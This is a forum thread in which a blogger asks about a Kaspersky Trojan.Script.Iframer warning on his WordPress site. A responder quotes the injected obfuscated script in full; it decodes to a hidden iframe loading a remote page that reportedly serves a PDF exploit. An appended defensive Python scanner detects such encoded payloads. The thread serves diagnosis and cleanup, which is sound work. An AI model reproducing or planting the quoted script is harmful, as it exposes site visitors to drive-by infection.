Full Version: HEUR:Trojan.Script.Iframer
Steven Wagenheim
Need help.

Just got the following message from my own Blog from Kaspersky.

The requested URL could not be retrieved

While trying to retrieve the URL:

~~ snip

The following error was encountered:

The requested object is INFECTED with the following viruses: HEUR:Trojan.Script.Iframer


Please contact your service provider if you consider it incorrect.

Please tell me if this is a false positive and if not, how do I clear this up?
Lucian Bara
Hello,
It's not a false positive; there's an obfuscated script on that page (I broke a few lines on the script):
CODE
fun   cti    on Decode(){var temp="",i,c=0,out=""; var str="60!105!     102!114!97!109!101!32          !115!114!99!61!34!104!116!116!112!58!47!47!102!105!108!97!114!109!111!110!46!105!110!102!111!47!100!111!99!115!47!105!110!102!111!46!104!116!109!108!34!32!115!116!121!108!101!61!34!112!111         !115!105!116!105!111!110!58!97!98!115!111!108!117!116!101!59!32!116!111!112!58!48!59!32!108!101!102!116!58!48!59!119!105!100!116!104!58!49!112!120!59!32!104!101!105!103!104!116!58!49!112!120!59!32!118!105!115!105!98!105!108!105!116!121!58!104!105!100!100!101!110!59!34!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);}Decode();

That script leads to a PDF exploit. To clear it up you need to search through the code and remove the script, also update WordPress if it's the case, and change administrative passwords.
Steven Wagenheim
Can you tell me which file this is located in? I don't even know where to begin to look for this.
Baz^^
I think the WordPress forum would probably be the best place to ask. I'm not an expert in that blogging software, so the best place to ask is there. I can see the code right at the top of the blog page source, but I am not sure where WordPress itself would store it (index.html maybe?)

Make sure you update to the latest WordPress ASAP to stop it happening again. As far as I can tell you are running a version previous to 2.7, which is the current up-to-date and secure release.
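
Added example, not part of the original thread or any poster's code: one way to find which file carries a script like the one quoted above is to scan a local copy of the site for quoted runs of decimal character codes and decode them statically, without executing anything. The file suffix list, the 16-code threshold, and the sample page with its placeholder URL are assumptions constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Quoted literal made only of digits, whitespace and one-character delimiters.
NUMERIC_LITERAL = re.compile(r"""(["'])([\d\s!,|;:#]{40,})\1""")
# Markup that a decoded string should never produce on a clean page.
SUSPICIOUS = re.compile(r"<\s*(iframe|script)\b", re.I)

def decode_charcodes(literal, min_codes=16):
    """Statically decode '60!105!...' style data; None if it is not char codes."""
    compact = re.sub(r"\s+", "", literal)   # undo whitespace padding
    tokens = [t for t in re.split(r"\D+", compact) if t]
    if len(tokens) < min_codes:
        return None
    try:
        return "".join(chr(int(t)) for t in tokens)
    except (ValueError, OverflowError):     # not valid code points
        return None

def scan_text(text):
    """Return [(line_number, decoded_markup)] for each suspicious literal."""
    findings = []
    for m in NUMERIC_LITERAL.finditer(text):
        decoded = decode_charcodes(m.group(2))
        if decoded and SUSPICIOUS.search(decoded):
            findings.append((text.count("\n", 0, m.start()) + 1, decoded))
    return findings

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Yield (path, line, decoded) for every hit under root."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            for line, decoded in scan_text(path.read_text(errors="replace")):
                yield path, line, decoded

# Constructed sample (placeholder URL), encoded the same way as the posted script.
SAMPLE_IFRAME = ('<iframe src="http://example.invalid/x.html" '
                 'style="width:1px;height:1px;visibility:hidden;"></iframe>')
SAMPLE_PAGE = ('<html>\n<script>var str="'
               + "".join(f"{ord(c)}!" for c in SAMPLE_IFRAME)
               + '";</script>\n<p>post body</p>\n')

if __name__ == "__main__":
    hits = (scan_tree(sys.argv[1]) if len(sys.argv) > 1
            else (("<sample>", *f) for f in scan_text(SAMPLE_PAGE)))
    for path, line, decoded in hits:
        print(f"{path}:{line}: decodes to {decoded!r}")
```

Run it with the path to a downloaded copy of the site as the only argument; with no argument it scans the constructed sample.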